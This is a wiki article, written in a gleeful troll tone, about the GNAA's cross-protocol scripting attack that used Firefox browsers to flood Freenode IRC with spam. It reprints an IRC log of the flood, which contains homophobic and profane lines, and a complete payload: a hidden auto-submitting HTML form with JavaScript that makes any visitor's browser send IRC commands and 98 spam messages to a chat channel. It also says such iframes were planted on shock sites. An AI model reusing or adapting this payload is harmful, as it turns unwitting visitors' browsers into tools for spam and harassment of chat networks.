The OhInternet Forums are now open to everyone! Register today!
Also remember to join IRC, learn about it here.

Firefox XPS IRC Attack

Security oversight leaves Freenode IRC network vulnerable to attack

Matrix.gif

  • URL: Unknown
  • Location: Freenode
  • Date: Unknown
  • Facebook: Unknown
  • Twitter: Unknown
  • Known For:
 

Summary

Operations running smoothly at Freenode

One fine day on the internet, busy researchers at GNAA Institute of Computer Science unveiled an XPS (cross-protocol scripting) vulnerability in the Firefox browser (and by extension, Seamonkey) after discovering that the 6667 port was, surprisingly, not banned. This vulnerability allowed an HTTP form to send IRC commands to any given network through a Firefox web browser, thus the Firefox XPS IRC Attack began.

What happened to Freenode

Example Attack


[17:42]	-->|	Rucas (root@tor1.digineo.de) has joined #electricirc
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Electric|Master>	Hey look Chazz
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Electric|Master>	You were right :P
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Chazz>	Electric|Master, lulz
[17:43]	<Heather>	Someone make him stfu
[17:43]	<Chazz>	OHAI RUCAS!
[17:43]	<Chazz>	SUP SLUUUUUUUUUUUUT@!
[17:43]	|<--	Rucas has left 192.168.1.103 (I'm too gay to be in here)
[17:43]	<Chazz>	lol
[17:43]	<Chazz>	He needs a better proxy.
[17:44]	<Chazz>	Tor fails. xD
[17:44]	<Electric|Master>	Chazz, change your ident :P
[17:44]	<Chazz>	Now, Electric|Master,
[17:44]	<Chazz>	Suggestion
[17:44]	<Chazz>	DON'T **** W/ THE HEAD OF THE ****ING GNAA
[17:44]	<Electric|Master>	lol
[17:44]	<Chazz>	I'm not joking.
[17:44]	<Electric|Master>	Chazz, duh
[17:44]	<Electric|Master>	But seriously
[17:44]	<Chazz>	Rucas = HEAD of the gnaa
[17:44]	<Electric|Master>	o_o
[17:44]	-->|	Rucas (root@tor1.digineo.de) has joined #electricirc
[17:44]	<Heather>	LOL
[17:44]	|<--	Rucas has left 192.168.1.103 (Killed (Electric|Master (shutit)))
[17:44]	<Chazz>	B
[17:44]	<Chazz>	A
[17:44]	<Chazz>	D
[17:45]	<Chazz>	
[17:45]	<Chazz>	I
[17:45]	<Chazz>	D
[17:45]	<Chazz>	E
[17:45]	<Chazz>	A
[17:45]	<Chazz>	Electric|Bot,
[17:45]	<Chazz>	* Electric|Master
[17:45]	<Electric|Master>	lol
[17:45]	<Chazz>	Don't troll the trolls.
[17:45]	[ERROR]	The command “SET\IDENT” is not known to the server.
[17:45]	<Chazz>	It means they've won.
[17:45]	<Chazz>	Which will make them troll more.
[17:45]	<Chazz>	Do you WANT to get a botnet here?
[17:45]	<Electric|Master>	no :P
[17:46]	-->|	Rucas (root@tor1.digineo.de) has joined #electricirc
[17:46]	|<--	Rucas has left 192.168.1.103 (K-Lined: GNAA)

Result

"looks like an attack" - intelligence of average Freenode user
  • Opers were linked to webpages containing the vuln and their fellow IRCops began killing them
  • Paranoia spread throughout the network
  • Large amounts of legitimate users were receiving klines
  • A full month passed before counter measures were taken
  • Freenode never recovered
  • Goatse Security was formed
  • A similar vulnerability was later discovered in the Safari browser
  • lilo was just as useful protecting Freenode as he would have been alive

Origins

As detailed above, the attack was based upon the simple allowance of cross-protocol access to port 6667, the default port for IRC. An example form can be seen below. 

<form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain"> 
<textarea style="display:none" id="x" name="x"></textarea>
<input type="submit" style="display:none;" />
</form>
<script type="text/javascript">
function randomString(length) {
        var chars = "abcdefghiklmnopqrstuvwxyz";
        var randomstring = '';
        for (var i=0; i<length; i++) {
                var rnum = Math.floor(Math.random() * chars.length);
                randomstring += chars.substring(rnum,rnum+1);
        }
        return randomstring;
}
n=randomString(Math.floor(Math.random()*10+3));
i=randomString(Math.floor(Math.random()*10+3));
te=document.getElementById('x');
te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #ubuntu\n'+new Array(99).join('PRIVMSG #ubuntu :!ops Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
te.parentNode.submit()
</script>



iframes containing the above were added to Last Measure, along with countless mock-blogs to ensure complete ruin of the Freenode IRC network.

Current status

Patches were released for IRC server software, the Firefox hole was patched, and the GNAA laughed all the way to the lulzbank.



Related Pages

Firefox
GNAA
IRC
Last Measure

External Links


This article is part of a series on events.
You can find additional events here.
Explore our other categories for information on different subjects!


This article is part of a series on software.
You can find additional software here.
Explore our other categories for information on different subjects!
Retrieved from "http://ohinternet.com/Firefox_XPS_IRC_Attack"